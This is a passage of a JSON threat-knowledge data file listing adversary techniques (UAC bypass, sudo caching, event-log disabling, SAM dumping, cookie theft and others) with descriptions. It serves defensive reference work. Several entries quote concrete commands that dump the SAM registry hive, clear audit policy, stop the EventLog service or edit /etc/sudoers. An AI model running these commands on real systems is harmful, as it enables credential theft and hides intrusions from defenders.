(compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser. JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application (HTA) pages. JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and AppleScript. Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework. Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a Drive-by Compromise or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of Obfuscated Files or Information.", "detection": ""}, {"attack_id": "T1685.003", "name": "Modify or Spoof Tool UI", "tactics": ["defense-impairment"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may spoof or manipulate security tool user interfaces (UIs) to falsely indicate tools are functioning normally and delay detection and response. Adversaries may present misleading or falsified security tool interfaces (UIs) that display normal or healthy status indicators, even when underlying security tools have been disabled, degraded, or otherwise tampered with. Security tools typically provide visibility into system health, alerting, and operational status; by misrepresenting this information, adversaries can undermine defender trust in these signals and obscure the true security posture of the system. This behavior is often used in conjunction with efforts to disable or modify tools, where adversaries first impair the functionality of defenses (e.g., EDR, logging agents) and then replace or mimic their interfaces to conceal the loss of visibility. By maintaining the appearance of normal operations, such as showing active protection, successful updates, or absence of threats, adversaries can delay investigation and response, enabling continued malicious activity. For example, adversaries may display a fake Windows Security interface or system tray icon indicating a “protected” or “healthy” state after disabling Windows Defender or related services.", "detection": ""}, {"attack_id": "T1590.002", "name": "DNS", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via DNS/Passive DNS. DNS information may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Active Scanning), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services). Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.", "detection": ""}, {"attack_id": "T1485.001", "name": "Lifecycle-Triggered Deletion", "tactics": ["impact"], "platforms": ["IaaS"], "description": "Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within. Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time. If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day. In addition to destroying data for purposes of extortion and Financial Theft, adversaries may also perform this action on buckets storing cloud logs for Indicator Removal.", "detection": ""}, {"attack_id": "T1123", "name": "Audio Capture", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", "detection": ""}, {"attack_id": "T1543", "name": "Create or Modify System Process", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Containers", "Linux", "macOS", "Windows"], "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters. Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.", "detection": ""}, {"attack_id": "T1133", "name": "External Remote Services", "tactics": ["persistence", "initial-access"], "platforms": ["Containers", "Linux", "macOS", "Windows"], "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally. Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as a redundant or persistent access mechanism during an operation. Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard. Adversaries may also establish persistence on network by configuring a Tor hidden service on a compromised system. Adversaries may utilize the tool `ShadowLink` to facilitate the installation and configuration of the Tor hidden service. Tor hidden service is then accessible via the Tor network because `ShadowLink` sets up a .onion address on the compromised system. `ShadowLink` may be used to forward any inbound connections to RDP, allowing the adversaries to have remote access. Adversaries may get `ShadowLink` to persist on a system by masquerading it as an MS Defender application.", "detection": ""}, {"attack_id": "T1546.006", "name": "LC_LOAD_DYLIB Addition", "tactics": ["privilege-escalation", "persistence"], "platforms": ["macOS"], "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.", "detection": ""}, {"attack_id": "T1539", "name": "Steal Web Session Cookie", "tactics": ["credential-access"], "platforms": ["Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols. There are several examples of malware targeting cookies from web browsers on the local system. Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on User Execution by tricking victims into running malicious JavaScript in their browser. There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns. After an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.", "detection": ""}, {"attack_id": "T1053.007", "name": "Container Orchestration Job", "tactics": ["execution", "persistence", "privilege-escalation"], "platforms": ["Containers"], "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks. An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.", "detection": ""}, {"attack_id": "T1568.002", "name": "Domain Generation Algorithms", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions. DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders. Adversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.", "detection": ""}, {"attack_id": "T1036.007", "name": "Double File Extension", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies. Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain Initial Access into a user’s system via Spearphishing Attachment then User Execution. For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware. Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", "detection": ""}, {"attack_id": "T1548.002", "name": "Bypass User Account Control", "tactics": ["privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script. Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.", "detection": ""}, {"attack_id": "T1496.003", "name": "SMS Pumping", "tactics": ["impact"], "platforms": ["SaaS"], "description": "Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability. SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider. Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background. In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.", "detection": ""}, {"attack_id": "T1016.001", "name": "Internet Connection Discovery", "tactics": ["discovery"], "platforms": ["Windows", "Linux", "macOS", "ESXi"], "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using Ping, tracert, and GET requests to websites, or performing initial speed testing to confirm bandwidth. Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", "detection": ""}, {"attack_id": "T1548.003", "name": "Sudo and Sudo Caching", "tactics": ["privilege-escalation"], "platforms": ["Linux", "macOS"], "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\" Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL. Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers. In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", "detection": ""}, {"attack_id": "T1685.001", "name": "Disable or Modify Windows Event Log", "tactics": ["defense-impairment"], "platforms": ["Windows"], "description": "Adversaries may disable or modify the Windows Event Log to limit data that can be leveraged for detections and audits. Windows Event Log records user and system activity such as login attempts and process creation. This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications. By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to `Security Settings\\Local Policies\\Audit Policy` for basic audit policy settings or `Security Settings\\Advanced Audit Policy Configuration` for advanced audit policy settings. `auditpol.exe` may also be used to set audit policies. Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the `Set-Service -Name EventLog -Status Stopped` or `sc config eventlog start=disabled` commands (followed by manually stopping the service using `Stop-Service -Name EventLog`). Additionally, the service may be disabled by modifying the \"Start\" value in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog` then restarting the system for the change to take effect. There are several ways to disable the EventLog service via registry key modification. Without Administrator privileges, adversaries may modify the \"Start\" value in the key `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security`, then reboot the system to disable the Security EventLog. With Administrator privilege, adversaries may modify the same values in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System` and `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application` to disable the entire EventLog. Additionally, adversaries may use `auditpol` and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the `/success` or `/failure` parameters. For example, `auditpol /set /category:\"Account Logon\" /success:disable /failure:disable` turns off auditing for the Account Logon category. To clear the audit policy, adversaries may run the following lines: `auditpol /clear /y` or `auditpol /remove /allusers`.", "detection": ""}, {"attack_id": "T1682", "name": "Query Public AI Services", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may query publicly accessible artificial intelligence (AI) services, such as large language models (LLMs), to support targeting and operations. In addition to searching websites or databases directly (i.e., Search Open Websites/Domains), adversaries may use AI services to synthesize, aggregate, and analyze publicly available information at scale. This may include identifying individuals or organizations to target, researching organizational structures and personnel, identifying technologies used by target organizations, researching business relationships to develop plausible pretexts for Social Engineering approaches, identifying contact information for use in Phishing or Phishing for Information, or gathering derogatory or sensitive information about individuals that may be used for extortion or coercion. Information gathered through AI services may be leveraged for other behaviors, such as establishing operational resources (i.e., Generate Content or Establish Accounts. For obtaining access to AI tools and services, see Artificial Intelligence.", "detection": ""}, {"attack_id": "T1560.003", "name": "Archive via Custom Method", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.", "detection": ""}, {"attack_id": "T1578", "name": "Modify Cloud Compute Infrastructure", "tactics": ["defense-impairment"], "platforms": ["IaaS"], "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots. Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.", "detection": ""}, {"attack_id": "T1584.008", "name": "Network Devices", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not Initial Access to that environment, but rather to leverage these devices to support additional targeting. Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for Phishing campaigns (i.e., Link Target) or enabling the required access to execute Content Injection operations. Adversaries may also be able to harvest reusable credentials (i.e., Valid Accounts) from compromised network devices. Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses. Compromised network devices may be used to support subsequent Command and Control activity, such as Hide Infrastructure through an established Proxy and/or Botnet network.", "detection": ""}, {"attack_id": "T1583.008", "name": "Malvertising", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements. Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software. Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts. Malvertising may be used to support Drive-by Target and Drive-by Compromise, potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser. Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement. Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.", "detection": ""}, {"attack_id": "T1069", "name": "Permission Groups Discovery", "tactics": ["discovery"], "platforms": ["Containers", "IaaS", "Identity Provider", "Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.", "detection": ""}, {"attack_id": "T1114", "name": "Email Collection", "tactics": ["collection"], "platforms": ["Windows", "macOS", "Linux", "Office Suite"], "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses. Adversaries can collect or forward email from mail servers or clients.", "detection": ""}, {"attack_id": "T1003.002", "name": "Security Account Manager", "tactics": ["credential-access"], "platforms": ["Windows"], "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * gsecdump * Mimikatz * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\\sam sam * reg save HKLM\\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes. Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.", "detection": ""}, {"attack_id": "T1596.002", "name": "WHOIS", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers. Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).", "detection": ""}, {"attack_id": "T1542.001", "name": "System Firmware", "tactics": ["stealth", "persistence"], "platforms": ["Network Devices", "Windows"], "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", "detection": ""}, {"attack_id": "T1594", "name": "Search Victim-Owned Websites", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships. Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Trusted Relationship or Phishing). In addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as Wordlist Scanning, as well as by leveraging files such as sitemap.xml and robots.txt.", "detection": ""}, {"attack_id": "T1069.003", "name": "Cloud Groups", "tactics": ["discovery"], "platforms": ["SaaS", "IaaS", "Office Suite", "Identity Provider"], "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts . Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google. In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role. Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API . Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", "detection": ""}, {"attack_id": "T1574.011", "name": "Services Registry Permissions Weakness", "tactics": ["stealth", "execution"], "platforms": ["Windows"], "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through access control lists and user permissions. If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted. The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL. If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL. Adversaries may also add the Parameters key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the Parameters key of a given services registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked. For example, the registry path HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters contains the AutodiaDLL value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the AutodiaDLL to point to a hijacked or malicious DLL: \"AutodialDLL\"=\"c:\\temp\\foo.dll\" This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.", "detection": ""}, {"attack_id": "T1596.001", "name": "DNS/Passive DNS", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS). Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Search Victim-Owned Websites or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).", "detection": ""}, {"attack_id": "T1499.003", "name": "Application Exhaustion Flood", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS"], "description": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.", "detection": ""}, {"attack_id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools", "tactics": ["initial-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications, such as pip and NPM packages, may be targeted as a means to add malicious code to users of the dependency. This may also include abandoned packages, which in some cases could be re-registered by threat actors after being removed by adversaries. Adversaries may also employ \"typosquatting\" or name-confusion by choosing names similar to existing popular libraries or packages in order to deceive a user. Additionally, CI/CD pipeline components, such as GitHub Actions, may be targeted in order to gain access to the building, testing, and deployment cycles of an application. By adding malicious code into a GitHub action, a threat actor may be able to collect runtime credentials (e.g., via Proc Filesystem) or insert further malicious components into the build pipelines for a second-order supply chain compromise. As GitHub Actions are often dependent on other GitHub Actions, threat actors may be able to infect a large number of repositories via the compromise of a single Action. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.", "detection": ""}, {"attack_id": "T1588.004", "name": "Digital Certificates", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if the certificate is trusted or otherwise added to the root of trust (i.e. Install Root Certificate). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities. Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free. After obtaining a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.", "detection": ""}, {"attack_id": "T1583.002", "name": "DNS Server", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic (DNS). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.", "detection": ""}, {"attack_id": "T1561", "name": "Disk Wipe", "tactics": ["impact"], "platforms": ["Linux", "macOS", "Windows", "Network Devices"], "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. To maximize impact on the target organization in operations where network-wide availability interruption is the 